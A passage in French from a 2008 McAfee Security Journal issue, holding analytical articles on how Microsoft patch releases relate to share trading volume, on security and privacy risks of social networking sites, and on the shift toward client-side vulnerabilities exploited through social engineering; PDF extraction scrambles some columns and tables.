Volume moyen, année complète

86 738 696 64 210 868 68 753 419 67 227 483 67 260 018
(jours sans événements)
Volume moyen, jour de publication de correctifs
75 584 620 57 840 233 63 786 108 65 453 142 65 439 875
mensuels (Patch Tuesday)
Volume moyen, un mardi autre que
Patch Tuesday 79 818 571 59 305 574 64 967 877 69 691 473 66 471 610

Ecart moyen en volume d'actions MSFT échangées

(entre Patch Tuesday et l'année complète) -10,97 % -7,47 % -4,90 % -1,74 % -2,03 %

Ecart moyen en volume d'actions MSFT échangées

(entre Patch Tuesday et les jours sans événements) -12,86 % -9,92 % -7,22 % -2,64 % -2,71 %

Volume moyen pour l'indice ^IXIC

année complète 2 249 267 340 2 089 534 502 1 926 859 522 1 731 835 794 1 769 480 040

Volume moyen pour l'indice ^IXIC,

année complète (jours sans événements) 2 271 900 270 2 094 466 552 1 935 854 692 1 732 949 769 1 768 463 981

Volume moyen pour l'indice ^IXIC le jour de

2 161 318 000 2 054 922 500 2 009 946 667 1 745 967 500 1 759 816 667
publication des correctifs mensuels (Patch Tuesday)
Volume moyen, pour l'indice ^IXIC un mardi
autre que Patch Tuesday 2 249 947 143 2 107 280 909 1 813 831 818 1 658 301 818 1 752 408 182

Ecart moyen en volume pour l'indice ^IXIC

entre Patch Tuesday et l'année complète) -3,91 % -1,66 % 4,31 % 0,82 % -0,55 %
Figure 6 : L'entrée en vigueur de
Ecart moyen en volume pour l'indice ^IXIC la publication mensuelle planifiée
-4,87 % -1,89 % 3,83 % 0,75 % -0,49 % des correctifs (Patch Tuesday)
(entre Patch Tuesday et les jours sans événements)
a apparemment convaincu
Différence pour l'action MSFT entre Patch -5,30 % -2,47 % -1,82 % -6,08 % -1,55 % les opérateurs boursiers qu'il
Tuesday et un autre mardi
n'existe pas d'avantage à
Différence pour l'indice ^IXIC entre Patch retirer des seuls événements de
-3,94 % -2,48 % 10,81 % 5,29 % 0,42 %
Tuesday et un autre mardi diffusion de correctifs.

AUTOMNE 2008 25
La figure 5 (page 25) montre que le jour de la publication d'un
bulletin de sécurité non planifié en 2003 et en 2002, le volume
moyen des actions échangées dépassait le volume moyen de
l'année, respectivement de 7,6 % et de 2,46 % en moyenne.
En les comparant uniquement aux jours sans événements
pour le volume moyen de l'année complète, ce chiffre atteint
respectivement 8,53 et 3 %.
Ces chiffres contrastent nettement avec les écarts de volume
constatés lors des publications de correctifs mensuels, plus
prévisibles, comme l'illustre la figure 6 (page 25). Nous avons
également inclus une comparaison entre l'action Microsoft
(MSFT) et l'indice NASDAQ Composite (^IXIC).
Cela sous-entendrait que le passage d'une publication non
planifiée des bulletins (marche aléatoire) à une publication
préplanifiée (le deuxième mardi du mois) a entraîné une
diminution de l'intérêt des opérateurs en bourse pour les
événements associés à Patch Tuesday.
Examinons à présent les données de comparaison concernant
la publication des bulletins Microsoft Security Bulletin Advance
Notification (figure 7 ci-dessous).
Pourquoi le volume moyen des transactions est-il plus faible le jour
de cette notification avancée et le jour de publication des correctifs
mensuels ? Selon notre hypothèse, la différence entre le volume
moyen de l'année et le volume moyen enregistré le jour des
correctifs mensuels peut s'expliquer en partie par des événements
d'importance majeure affectant la moyenne annuelle (en vertu de
la théorie des martingales) et qui, statistiquement, ont moins de
chances de se produire le jour de la publication mensuelle compte
tenu de sa faible fréquence (douze fois par an)6.
Il se peut que certains utilisent déjà des
menaces de type « jour zéro » dans un
but lucratif, non plus simplement en les
incorporant à des chevaux de Troie voleurs
de mots de passe, mais pour prendre des
positions de vente ou d'option sur les
marchés des actions et des produits dérivés.
Communiqués de presse, réactions et implications
Les implications de cette analyse sont intéressantes et nous
espérons que cet article contribuera à stimuler la réalisation de
nouvelles études concernant l'influence des vulnérabilités et des
menaces sur les marchés des actions.
Prenons l'exemple du canular Emulex7. Dans cette affaire, une
personne a publié un faux communiqué de presse sur le départ
du président-directeur général de la société qui a entraîné ce
jour-là une chute de 62 % du cours de l'action Emulex. L'auteur
du canular avait pris une position courte importante sur l'action
et a réalisé un bénéfice de plus de 250 000 dollars. Il s'agissait
d'une fraude manifeste. De la même façon, les médias font
périodiquement état de délits d'initiés (tout aussi illégaux).
En revanche, si les fluctuations du cours de l'action sont liées à
des annonces de correctifs ou de vulnérabilités, que se passerait-il
si un investisseur prenait une position courte sur une importante
société d'édition de logiciels et publiait une série de vulnérabilités

Publication des bulletins Microsoft Security Bulletin Advance Notification

ECARTS DE VOLUME D’ACTIONS MSFT ECHANGEES (NOTIFICATION AVANCEE) 2008 2007 2006

Volume moyen, année complète 84 898 274 62 506 437 67 074 387

Volume moyen, année complète (jours sans événements) 86 738 696 64 210 868 68 753 419

Volume moyen, jour de notification avancée 82 848 700 61 532 042 54 484 850

Ecart moyen en volume -2,41 % -1,56 % -18,77 %

Ecart moyen en volume par rapport aux jours sans événements -4,48 % -4,17 % -20,75 %

Volume moyen pour l’indice ^IXIC, année complète 2 249 267 340 2 089 534 502 1 926 859 522
Figure 7 : En moyenne, le
volume d'échange des actions
Volume moyen pour l’indice ^IXIC, année complète (jours sans événements) 2 271 900 270 2 094 466 552 1 935 854 692 Microsoft est plus faible les jours
de notification avancée et de
Volume moyen pour l’indice ^IXIC lors d’une notification avancée 2 221 380 000 2 224 365 833 1 872 442 500
publication des correctifs mensuels.

26 McAFEE SECURITY JOURNAL

avec exploits sur la liste de diffusion Full Disclosure ? Nous
pourrions peut-être assister à un événement semblable au mois
des bogues dans les navigateurs web, sauf que ce dernier serait
dirigé un jour donné contre un seul éditeur. Si cela se passe
pendant les heures d'ouverture des marchés et un jour où le
reste de l'actualité ne risque pas de distraire les investisseurs
(par exemple un mardi ou un jeudi), la pression à la baisse
sur l'action pourrait être importante au niveau du particulier.
L'opération serait incontestablement illégale si les vulnérabilités
n'étaient pas réelles (on pourrait alors parler de diffamation ou
de fraude). Qu'en est-il en revanche si elles étaient avérées ? La
manœuvre serait-elle illégale ? La divulgation d'informations
vraies, même dans un but de manipulation potentielle, n'est
pas nécessairement considérée comme de l'ingénierie sociale, ni
même une pratique contraire à la loi.
Il est évidemment possible de remettre en cause la légalité de
l'action, mais pensez à la controverse Ford-Firestone relative aux
pneumatiques8. Si vous aviez conduit une Ford à cette époque, eu
des problèmes de pneus et décidé de prendre une position courte
sur l'action, votre transaction aurait-elle été légale ? Tout à fait.
Mais si vous aviez pris une position courte sur l'action puis averti
Firstone, Ford et les autres, la transaction aurait-elle été légale ?
Comme pour tout vecteur d'attaque ou vulnérabilité,
l'information et la divulgation améliorent souvent la position
de sécurité des personnes en mesure de résoudre le problème.
En parlant ouvertement des failles et des faiblesses, peut-être
pouvons-nous améliorer et surveiller plus efficacement le
système. Il se peut que certains utilisent déjà des menaces de
type « jour zéro » dans un but lucratif, non plus simplement en
les incorporant à des chevaux de Troie voleurs de mots de passe,
mais pour prendre des positions de vente ou d'option sur les
marchés des actions et des produits dérivés.
Il est clair que les spammeurs ont mis au point des techniques pour
tirer profit des marchés financiers : nous avons reçu un nombre
important de spam associé au marché des actions cotées en cents.
NOTES
1 Goldsmith D. et Rauch J., Matasano Security, « Hacking Capitalism »
(Le piratage du capitalisme), Black Hat USA 2007, 2 août 2007
2 « FIX (Financial Information eXchange) », Wikipedia, 20 avril 2008
http://en.wikipedia.org/wiki/Financial_Information_eXchange
3 « Random walk hypothesis » (Marche aléatoire), Wikipedia, 15 mai 2008 —
http://en.wikipedia.org/wiki/Random_walk_hypothesis
4 « Efficient Market Hypothesis » (Efficience du marché), Wikipedia, 15 mai 2008 —
http://en.wikipedia.org/wiki/Random_walk_hypothesis
5 « Past performance not indicative of future results » (Les performances passées
ne sont pas indicatives des résultats à l'avenir), CBOE, 22 mai 2008 —
http://www.cboe.com/micro/vix/faq.aspx
6 « Martingale (probability theory) » (Théorie des martingales), Wikipedia, 22 mai
2008 — http://en.wikipedia.org/wiki/Martingale_%28probability_theory%29
7 « Emulex Hoax » (Les fausses infos sur Emulex), Wikipedia, 20 avril 2008 —
http://en.wikipedia.org/wiki/Emulex_hoax
8 « Firestone and Ford tire controversy » (Controverse entre Firestone et Ford),
Wikipedia, 20 avril 2008 —
http://en.wikipedia.org/wiki/Firestone_and_Ford_tire_controversy
Conclusion
Il reste encore beaucoup à faire pour déterminer l'impact des
vulnérabilités et des menaces sur les marchés des actions et
des produits dérivés. Cet article s'intéressait principalement aux
marchés des actions. Les marchés des produits dérivés opèrent
de façon similaire, si ce n'est que leur volatilité est bien plus
importante. S'ils éprouvent un certain niveau de confiance dans
une tendance, il serait probablement logique de la part des
opérateurs qui publient des vulnérabilités de faire coïncider la
publication avec des dates d'expiration d'option.
Je voudrais remercier mes collègues Craig Schmugar et Eugene
Tsyrklevich pour leur relecture de l'article et des données
présentées ainsi que pour leurs commentaires.—A.B.
Anthony Bettini fait partie de l'équipe de
direction de McAfee Avert Labs. Il est spécialisé
dans la sécurité et la détection de vulnérabilités
des systèmes Windows. M. Bettini a présenté un
exposé lors de la conférence National Information
Systems Security du National Institute of Standards
and Technology à Washington sur les techniques
d'antitraçage ; il a donné des conférences dans
de nombreuses sociétés classées au Global 2000.
Lorsqu'il travaillait pour Foundstone, il publiait
les nouvelles vulnérabilités découvertes au sein
des applications Microsoft Windows, ISS Scanner,
PGP, Symantec ESM et autres. Il est également
le réviseur technique du livre Hacking Exposed,
5e édition (McGraw-Hill) — paru en français sous
le titre « Halte aux hackers ».
AUTRES RÉFÉRENCES
t « CBOE's archive of historic VIX data, using newer algorithm for the pre-
September 22, 2003 algorithm switch » (Archives CBOE de données historiques
sur l'index VIX, utilisant l'algorithme le plus récent relativement au changement
du 22/09/2003), 20 avril 2008 — http://www.cboe.com/micro/vix/historical.aspx
t Lo, A. W. « The Adaptive Markets Hypothesis: Market Efficiency from an
Evolutionary Perspective » (Hypothèse des marchés adaptatifs : efficience des
marchés d'un point de vue évolutionnel), Journal of Portfolio Management.
t La plupart des mesures financières ont été reproduites avec l'aimable
autorisation de Yahoo Finance. 15 mai 2008 — http://finance.yahoo.com
t D'autres mesures financières ont été reproduites avec l'aimable autorisation de
Google Finance. 20 avril 2008 — http://finance.google.com
AUTOMNE 2008 27
L'avenir des sites
de réseau social
Craig Schmugar
Ces dernières années, les sites de réseau social tels que MySpace, Facebook et bien
d'autres ont vu leur popularité croître à ce point qu'ils font désormais partie du paysage.
Dans l'esprit de la plupart des gens, il s'agit d'un phénomène relativement neuf
alors qu'en réalité, des sites tels que Classmates.com et SixDegrees.
com existent depuis plus de dix ans. Il n'en reste pas moins que
ces sites n'ont connu un véritable essor qu'au cours des dernières
années. Posons-nous d'abord la question de savoir ce qui caractérise
un site de réseau social. A la base, les sites de réseau social sont
des sites qui hébergent une communauté en ligne permettant aux
utilisateurs de partager des informations, de nouer de nouveaux
contacts et de renouer avec d'anciennes connaissances.
Les sites de réseau social sont importants à deux égards. D'une
part, ils sont la parfaite illustration des sites du Web 2.0, dont le
réseau d'utilisateurs représente la plate-forme et la communauté
détermine le contenu. La plate-forme se développe grâce aux
contributions des utilisateurs qui utilisent, pour ce faire, les
applications mises à la disposition de la communauté. D'autre
part, les sites de réseau social combinent divers canaux de
communication (e-mail, forums de messages, messagerie
instantanée et salles de chat) aux supports multimédias que sont
l'audio, la vidéo et l'impression. Au sein de ces communautés,
des personnes ayant des centres d'intérêt similaires partagent
informations, opinions et commentaires. De tels sites peuvent
servir de plates-formes de collaboration, ce qui permet aux
réseaux de gagner en valeur à mesure que leur parc d'utilisateurs
prend de l'ampleur. En outre, ces plates-formes représentent
des canaux de médias extrêmement directs et ciblés. Dans une
optique de marketing, les sociétés peuvent ainsi concentrer
leurs efforts sur les consommateurs réellement intéressés par
leurs produits. Les sites de réseau social hébergent une mine
d'informations qu'il est possible d'explorer et d'analyser dans
le but de compléter des profils d'utilisateur et de cartographier
de façon précise les relations entre les utilisateurs d'une part, et
entre les utilisateurs et leurs centres d'intérêt d'autre part.
La clé du succès d'un site de réseau social est un parc d'utilisateurs
bien développé et fidèle. Friendster.com en a fait la triste expérience.
Précurseur de MySpace, Friendster a été, à son heure de gloire, le
plus important site de réseau social. Cela n'a malheureusement
pas duré. Le site a été, en quelque sorte, victime de son succès.
28 McAFEE SECURITY JOURNAL
Lorsque le parc d'utilisateurs s'est fortement développé et que
le contenu proposé a évolué (notamment par l'ajout de jeux), le
système dorsal s'est trouvé incapable de faire face à la charge
supplémentaire. Les administrateurs du site ont été contraints
de limiter le contenu à bande passante élevée sans toutefois
remédier aux problèmes de performances, et les utilisateurs ont
fini par se détourner du site. De plus, Friendster attendait de
ses utilisateurs qu'ils se conforment à son modèle prédéterminé
d'utilisation du réseau et qu'ils correspondent à un certain profil.
MySpace constituait une plate-forme plus robuste, tout d'abord en
termes de bande passante, mais aussi en raison de la grande liberté
accordée aux utilisateurs pour créer, modifier et consulter un contenu
très diversifié. Lorsque le bruit a couru que MySpace était devenu le
nouveau Friendster, il n'a pas fallu longtemps pour que la majorité
des utilisateurs abandonnent ce dernier au profit du premier.
De cette première bataille dans l'univers des réseaux sociaux, on
peut tirer quelques enseignements : la souplesse de la plate-forme
est capitale, tout comme sa faculté de s'étendre et d'évoluer ou
encore sa capacité à fidéliser les utilisateurs. Le respect de ces trois
grands principes prépare l'avenir des sites de réseau social.
Insécurité sociale
MySpace a pu supplanter Friendster en offrant notamment
aux utilisateurs des possibilités de personnalisation accrues.
Mais les auteurs d'attaques en ont profité pour insérer du code
malveillant et lancer des attaques par phishing très convaincantes
directement à partir de leur profil MySpace.
Malheureusement, cette souplesse offerte aux utilisateurs crée un
environnement idéal pour les exploits, dont les malfaiteurs usent
et abusent. Dans la course aux parts de marché et pour éviter une
débâcle similaire à celle de Friendster, de nombreux sites de réseau
social ont relégué la sécurité au second plan. Ils sont par conséquent
le théâtre de nombreuses nuisances : vers, attaques par phishing,
vulnérabilités, collecte illicite d'informations, fuites de données,
distribution de publicités indésirables, diffamations et spam.
Le point sur la situation actuelle
Deux ans et demi après l'apparition, le 4 octobre 2005, de Samy,
premier ver de réseau social diffusé à grande échelle, la plupart
des anciennes vulnérabilités de sécurité ont été corrigées. Le
problème n'a pas disparu pour autant. A moins que les failles de
sécurité ne découragent les abonnés et diminuent leur nombre,
les vulnérabilités resteront légion et les vulnérabilités associées aux
scripts intersites, à l'instar de celle exploitée par Samy, figurent
parmi les types de vulnérabilités les plus souvent signalées dans la
base de données CVE (Common Vulnerabilities and Exposures)1. Et
tout porte à croire que la situation n'est pas près de s'améliorer.
En mai 2007, Facebook a lancé la plate-forme Facebook, qui
permettait à des développeurs tiers de créer et de commercialiser
des applications à l'intention des vingt millions d'utilisateurs actifs
de Facebook. Un an et quelque 50 millions d'utilisateurs plus
tard, plus de 20 000 applications Facebook ont été développées,
95 % des utilisateurs ayant exécuté au moins une application2.
Ces applications posent un risque supplémentaire dans la mesure
où les utilisateurs éprouvent un sentiment de sécurité illusoire en
associant ces applications à un site en lequel ils ont confiance, en
l'occurrence Facebook.com.
En janvier 2008, Facebook a interdit l'application Secret Crush
après avoir découvert qu'elle avait conduit des utilisateurs à
installer le logiciel publicitaire Zango3. (Reportez-vous à la figure 1
pour d'autres exemples de menaces répandues.) Cet exemple
illustre parfaitement l'absence de contrôle de Facebook sur les
applications publiées, ce qui ouvre la porte, potentiellement et
de facto, à de nombreuses menaces. Dans ce cas précis, il ne
s'agissait que d'un simple désagrément (publicitaire) mais qu'en
sera-t-il la prochaine fois ?
Profil des menaces associées aux réseaux sociaux
MENACE TYPE
Grey Goo ver
JS/QSpace ver
JS/SpaceFlash ver
JS/SpaceTalk extracteur d'informations
Kut Wormer ver
Fuites massives de photos personnelles fuite de données
PWS-Banker! 1d23 dérobeur de mots de passe
Samy ver
Scrapkut ver
Secret Crush programme indésirable
Ver Xanga ver
Figure 1 : Les vers et autres menaces sévissent sur les sites de réseau social en raison
de la trop grande confiance des utilisateurs envers les sites de leur communauté.
Chaque fois que vous cliquez sur un
lien, évaluez un blog ou conversez sur
un sujet spécifique, le site peut recueillir
des informations sur vous afin d'enrichir
votre réseau social.
Environ neuf mois après le lancement de la plate-forme
Facebook, MySpace lui a emboîté le pas et récemment, Google
a distribué une interface de programmation d'applications (API)
pour orkut, le site de réseau social de Google. Si ces plates-
formes ont ouvert la voie à la prochaine génération de sites de
réseau social, elles ont également contribué à créer un autre
vecteur d'exploits pour les auteurs d'attaques.
L'avenir du réseau social
L'importance des sites de réseau social ne cessera de croître en
raison du développement des plates-formes. Les applications phares
offriront la possibilité de se déplacer et de détecter la connexion et
l'emplacement géographique des utilisateurs dans le but de leur
offrir un plus grand confort de vie grâce à leur réseau virtuel : ils
voyageront toujours accompagnés de leur lien au réseau social.
Il sera possible de savoir qui parmi ses amis est en ligne, et si
certains d'entre eux sont proches. La triangulation des tours de
téléphonie mobile et les systèmes GPS permettront de transmettre
votre emplacement aux personnes de votre choix. Des services de
localisation géographique seront en mesure d'établir une liste des
entreprises et des lieux de loisir susceptibles de vous intéresser, en
fonction des informations et centres d'intérêt indiqués dans votre
profil. Les professionnels en déplacement pourront plus facilement
retrouver des collaborateurs et des clients lors de conférences et
de foires commerciales. Les rencontres en ligne connaîtront de
nouvelles perspectives, grâce à la création de communautés fondées
SITE
sur l'emplacement géographique. De la sorte, il sera possible non
Second Life seulement de rencontrer une personne en ligne, mais aussi de
MySpace converser avec l'âme sœur potentielle dans une même pièce.
MySpace Les sites sociaux seront également plus intelligents et pourront
recouper les informations relatives aux utilisateurs sur l'ensemble
MySpace
du Web. Un outil de navigation sociale tel que Digg sera associé
orkut à des réseaux sociaux et optimisé grâce à une technologie
MySpace d'autoapprentissage comme Pandora ou StumbleUpon, et
une fonction de marquage comme Flickr. Il sera ainsi possible
orkut
d'obtenir un flux plus constant et optimisé de données
MySpace pertinentes qui informera et éduquera la communauté de façon
orkut
bien plus efficace et ciblée qu'aujourd'hui.
FaceBook De votre iPhone, vous pourrez consulter les recommandations
des membres de votre réseau concernant les films à voir. Vous
Xanga
pourrez lire les critiques que vos amis ont appréciées et afficher
les horaires des cinémas proches de chez vous, de même qu'il
vous sera possible de savoir où se trouvent vos amis et combien
de temps il leur faudra pour vous retrouver.
AUTOMNE 2008 29
Les sites seront en mesure d'identifier vos centres d'intérêts en doute permettre de concilier convivialité et sécurité. La relation de
fonction de votre comportement : les sites web visités, les articles confiance entre les sites et les utilisateurs revêt une importance
consultés, la musique que vous écoutez, les amis avec lesquels cruciale dans le succès des réseaux de demain. Toute violation de
vous conversez ainsi que leurs centres d'intérêt, par exemple. Ces cette confiance peut entraîner l'échec de toute une communauté.
données seront utilisées pour vous tenir au courant de l'actualité
L'utilisation croissante de profils ouverts et portables, d'applications
qui vous intéresse, tout en éliminant les informations inutiles
composites (applications web associant le contenu de
dont les utilisateurs sont aujourd'hui bombardés. Vous évoluerez
plusieurs sources en un seul outil) et d'API ouvertes faciliteront
dans un environnement web très personnalisé qui nécessitera
considérablement l'utilisation intersite, mais elles compliqueront
très peu d'intervention directe de votre part. Alors que les sites
singulièrement la tâche des administrateurs chargés d'assurer la
du Web 1.0 étaient déterminés par les administrateurs de site
protection contre les menaces ciblant ces vecteurs. Déjà difficiles
et ceux du Web 2.0 par le contenu généré par les utilisateurs,
à détecter aujourd'hui, les attaques multiniveaux le seront sans
l'avenir du réseau social réside dans les relations entre les
doute encore plus demain. Elles pourront émaner d'un site et
utilisateurs et les contenus, combiné au comportement des
se propager via un autre avant d'apparaître sur un réseau social
utilisateurs pour personnaliser le contenu.
touché. Le système de protection en place sur l'hôte devra identifier
Les premiers sites de réseau social de la troisième génération, ou les relations entre les sites afin de faire le tri entre les interactions
Social Networking 3.0, peuvent donner froid dans le dos tant la intersites valides et non valides et d'identifier les menaces.
précision de « l'intelligence artificielle » est impressionnante. Leur
Le problème d'atteinte à la vie privée soulevé dans cet article
profilage prend ici un tout autre sens, dans la mesure où le site
(collecte et corrélation d'informations, suivi de l'emplacement
peut en fait rassembler des utilisateurs présentant des affinités
géographique) ne peut manquer d'interpeller de nombreux
ou des centres d'intérêt similaires. D'un certain point de vue, les
utilisateurs. Il est clair que bon nombre d'entre eux choisiront
profils de compatibilité utilisés par certains services de rencontres en
de ne pas s'abonner à de tels services. Néanmoins, lorsqu'ils
ligne peuvent être considérés comme l'un des premiers exemples
réaliseront les avantages offerts en retour de quelques éléments
de la création de relations sociales par le profilage en ligne et la
d'information et qu'ils auront établi des relations de confiance,
mise en relation de personnes compatibles. Toutefois, dans les
la majorité n'hésitera plus à communiquer certains détails. Les
sites de réseau social de troisième génération, ce concept est
fournisseurs sont très conscients de cette situation et encouragent
considérablement élargi sans qu'il soit nécessaire de remplir un long
les utilisateurs à une adoption progressive des services, notamment
questionnaire. Chaque fois que vous cliquez sur un lien, évaluez un
en n'autorisant la communication de l'emplacement qu'au niveau
blog ou conversez sur un sujet spécifique, le site peut recueillir des
du département ou de la ville, par exemple. Malheureusement, les
informations sur vous afin d'enrichir votre réseau social.
cyberprédateurs ne sont jamais loin et les vulnérabilités de sécurité
Qui seront les grands bénéficiaires de cette corrélation croissante peuvent avoir de graves conséquences si de telles informations
d'informations ? Les utilisateurs constituent évidemment un venaient à tomber entre leurs mains.
facteur essentiel mais d'autres acteurs cherchent à tirer parti
Les sites de réseau social entrent dans une période faste : ils se
de cette situation. Les annonceurs se réjouissent d'avance de la
développent rapidement, leur nombre d'utilisateurs ne cesse
hausse anticipée des taux de conversion lorsque le marketing
d'augmenter et leurs fonctionnalités se multiplient. Leur valorisation
ciblera les utilisateurs en fonction de leurs centres d'intérêt
s'élève à plusieurs milliards de dollars. Les grands bouleversements
spécifiques. Les utilisateurs accorderont inévitablement une
qui nous attendent sont à la fois excitants et dangereux. A de
attention plus grande aux publicités et à leur contenu.
nombreux égards, l'avenir des sites de réseau social risque fort
d'être déterminant pour l'avenir d'Internet lui-même.
Un risque en hausse
Si les avantages offerts aux utilisateurs se multiplient, il en ira de
même pour les opportunités d'attaque. Les spammeurs et les
Spécialiste de la recherche des menaces, Craig
escrocs chercheront à exploiter cette mine d'or et, grâce à toutes
Schmugar a réalisé de nombreuses études et
ces données, pourront créer bien plus facilement des attaques
neutralisé d'importantes menaces pour le compte
d'ingénierie sociale convaincantes. Le niveau de détail et de
de McAfee Avert Labs depuis l'année 2000. Il
personnalisation des messages risque fort de tromper la vigilance
a découvert et classé des milliers de nouvelles
des utilisateurs. Les réseaux de robots sociaux auront également
menaces dont les vers Blaster, Mydoom, Mywife
l'opportunité de perturber sérieusement l'écosystème, en
et Sasser. Il reconnaît avoir développé au cours de
empoisonnant le réseau avec des messages racoleurs et des faux
cette période certaines tendances antisociales...
témoignages. Les administrateurs auront du pain sur la planche
puisqu'ils devront veiller à la qualité du contenu tout en déjouant
les manœuvres des criminels, et sans pour autant empêcher les
autres utilisateurs de profiter des multiples avantages du site.
La sécurité des futurs réseaux sociaux dépendra pour beaucoup NOTES
du système de défense mis en place au niveau des serveurs. 1 http://cwe.mitre.org/documents/vuln-trends/index.html
Les systèmes dorsaux devront analyser un volume considérable 2 http://www.facebook.com/press/info.php?statistics
de données entrantes et sortantes à la recherche de preuves 3 http://www.zdnet.com.au/news/security/soa/Spyware-claims-kill-off-Facebook-
de délits ou de la présence de code malveillant. Les services de s-Secret-Crush/0,130061744,339284896,00.htm?omnRef=http://www.google.
vérification de la réputation des sites et du contenu peuvent sans com/search?num=100

30 McAFEE SECURITY JOURNAL

Le nouveau souffle
des vulnérabilités
Rahul Kashyap
Bien que l'ingénierie sociale n'intervienne pas dans tous les types de
menaces pour la sécurité, McAfee Avert Labs a constaté une nouvelle
tendance de plus en plus répandue : des auteurs de logiciels malveillants
utiliseraient l'ingénierie sociale pour exploiter des vulnérabilités logicielles.
La plupart des vers Internet les plus virulents du début de la
décennie exploitaient généralement des vulnérabilités présentes
dans des applications Microsoft. Ces vers bien connus que
sont Sasser, Blaster, Code Red ou SQL Slammer avaient tous un
point commun. (Notons au passage que Sasser et Blaster furent
découvert par Avert Labs, au même titre que d'autres logiciels
malveillants de premier plan.) Ces vers exploitaient tous des
vulnérabilités de serveurs. Ils avaient pour objectif la destruction
des serveurs par le biais d'une propagation automatique après
exploitation des failles. Bien que de nombreux produits de
fournisseurs différents aient connu des brèches de sécurité
semblables, nous nous attarderons ici principalement sur les
vulnérabilités et tendances relatives aux produits Microsoft. Cela
ne signifie aucunement que Microsoft soit particulièrement
vulnérable, mais nous considérons simplement que la popularité
des produits de cette marque auprès des particuliers et des
entreprises en fait une cible privilégiée des auteurs de logiciels
malveillants et des voleurs de données.
D'après Avert Labs, les vulnérabilités de serveurs pouvant être
exploitées par des vers ont diminué en nombre ces dernières
années, grâce à une utilisation plus fréquente de mesures de
sécurité permettant de protéger les appels de procédure à
distance. La figure 1 ci-contre répertorie toutes les vulnérabilités
exploitables par appels de procédure à distance Microsoft
Windows sur une période de dix ans, jusqu'au premier
trimestre 2008. Comme vous pouvez le constater, leur nombre
a été réduit de manière significative ces deux dernières années.
Cette tendance se manifeste également lorsqu'on isole ce type
de vulnérabilités pour les autres plates-formes serveur Microsoft
populaires, comme IIS Web Server ou SQL Server.
Microsoft a par ailleurs renforcé la protection de ses produits
en publiant le Service Pack 2 pour Windows XP. Parmi d'autres
mécanismes de protection, le Service Pack 2 incluait des outils de
prévention d'exécution des données2 qui, même s'ils n'étaient
pas infaillibles3, ont toutefois contribué à limiter la propagation
des vers de réseau qui, à cette époque, causaient d'importants
dommages aux produits Windows. Les effets du Service Pack 2
pour XP sont devenus beaucoup plus évidents quelques années
plus tard, lorsqu'un grand nombre d'utilisateurs sont passés à
cette nouvelle version du système d'exploitation.
Malheureusement, les auteurs de logiciels malveillants n'étaient
pas en reste. Ils se détournèrent en effet rapidement des
serveurs pour s'attaquer aux clients, mettant à jour de nouvelles
vulnérabilités dans Microsoft Office, Microsoft Internet Explorer
et dans de nombreux formats de fichiers propriétaires. Ces
attaques contre les clients furent marquées par l'apparition d'un
nombre important de fuzzers4 (dont le rôle est de repérer les
brèches de sécurité en bombardant une application avec des
données aléatoires), de bugs liés à l'analyse syntaxique dans un
langage de script et de vulnérabilités de contrôles ActiveX. Des
projets du type « Month of Browser Bugs5 » (Mois des bugs des
navigateurs), axfuzz6, COMRaider ou encore hamachi7 ont permis
d'éveiller l'intérêt dans ce domaine et de révéler les innombrables
vulnérabilités touchant les logiciels clients. La recherche de bugs
et l'exploitation d'applications clientes connurent à cette époque
Patchs de correction des vulnérabilités exploitables à distance Microsoft
14
12
10
8
6
4
2
0
1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008
Figure 1 : Microsoft a largement renforcé la sécurité des appels de procédure à
distance depuis 2006. (Source : Microsoft1)
AUTOMNE 2008 31
Patchs de correction des vulnérabilités d'Office
45
40
35
30
25
20
15
10
5 sociale vont de pair. Le lien entre ces deux facteurs est plus
0
1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008
Figure 2 : Le nombre de vulnérabilités de Microsoft Office a augmenté en 2006 et est
resté élevé les deux années suivantes. (Source : Microsoft)
leur apogée, et cette tendance se poursuit au moment même
où nous écrivons cet article. Le nombre de logiciels touchés est
difficile à déterminer. Certaines sources prétendent toutefois
qu'ils se compteraient en plusieurs centaines de millions8.
La figure 2 illustre clairement la croissance soudaine du nombre
de vulnérabilités affectant Microsoft Office. Elles ont connu leur
point culminant en 2006 et continuent depuis à donner du fil à
retordre aux équipes de Microsoft.
La grande majorité de ces vulnérabilités concernait Office 2000.
Cette version est en effet très répandue, et par conséquent plus
largement exploitée. Dans le modèle économique des auteurs de
logiciels malveillants, les vulnérabilités d'Office 2000 représentent
un meilleur retour sur investissement. Cela est principalement
dû au fait que cette suite logicielle souffre depuis longtemps
d'une défaillance majeure en termes de sécurité : les utilisateurs
d'Office 2000 doivent en effet se rendre sur le site web
« Office Update » pour télécharger des patchs9, et la procédure
automatique en ligne n'inclut pas les mises à jour spécifiques
à Office 2000 et Office 97. Cette négligence représente une
véritable aubaine pour les auteurs de logiciels malveillants qui
peuvent ainsi profiter du fait que de nombreux utilisateurs
n'effectueront pas de mise à jour régulière de leur suite Office10.
Le nombre d'ordinateurs transformés en « zombies » (et donc
contrôlés par des pirates) en raison d'une telle brèche de sécurité
pourrait s'élever à plusieurs dizaines de milliers.
Bien que cet article se concentre avant tout sur les vulnérabilités
propres aux produits Microsoft, cette tendance affecte également
d'autres fournisseurs de logiciels clients populaires, comme
Adobe, Mozilla, Apple et bien d'autres encore. Le « mois des bugs
Apple » (Month of Apple Bugs) a mis en évidence de nombreux
problèmes rencontrés par les clients ; de plus, on a enregistré une
augmentation fulgurante du nombre de vulnérabilités découvertes
dans des logiciels largement répandus comme Apple QuickTime,
Adobe Flash Player ou Adobe Acrobat Reader. L'exploitation
récente de la vulnérabilité touchant la fonction mailto: dans les
fichiers PDF (CVE-2007-5020)11 et de la vulnérabilité liées au code
Flash utilisant ActionScript (CVE-2007-0071) sont des exemples de
failles critiques qui ont affecté des milliers d'utilisateurs.
32 McAFEE SECURITY JOURNAL
Attaques ciblées
La clé des vulnérabilités touchant les systèmes clients est que
pour pouvoir être exploitées, l'intervention de l'utilisateur est
nécessaire. Les auteurs de logiciels malveillants ont par conséquent
dû trouver des idées novatrices pour tromper les utilisateurs et les
inciter à cliquer sur des liens spécifiques ou à télécharger certains
documents ou images depuis Internet. L'une des avancées les plus
importantes en matière d'exploitation de systèmes clients a été
l'évolution rapide du spam fondé sur l'ingénierie sociale.
L'exploitation de vulnérabilités de systèmes clients et l'ingénierie
qu'évident et la menace est récemment devenue plus complexe.
Cette complexité repose en partie sur les attaques ciblées
d'ingénierie sociale, lesquelles représentent une nouvelle
tendance dans le paysage actuel des menaces. Ces attaques
ciblées visent plus particulièrement les structures relevant de
l'armée ou de la défense nationale12. Depuis la vague des
vulnérabilités Office en 2006, de nombreux rapports ont
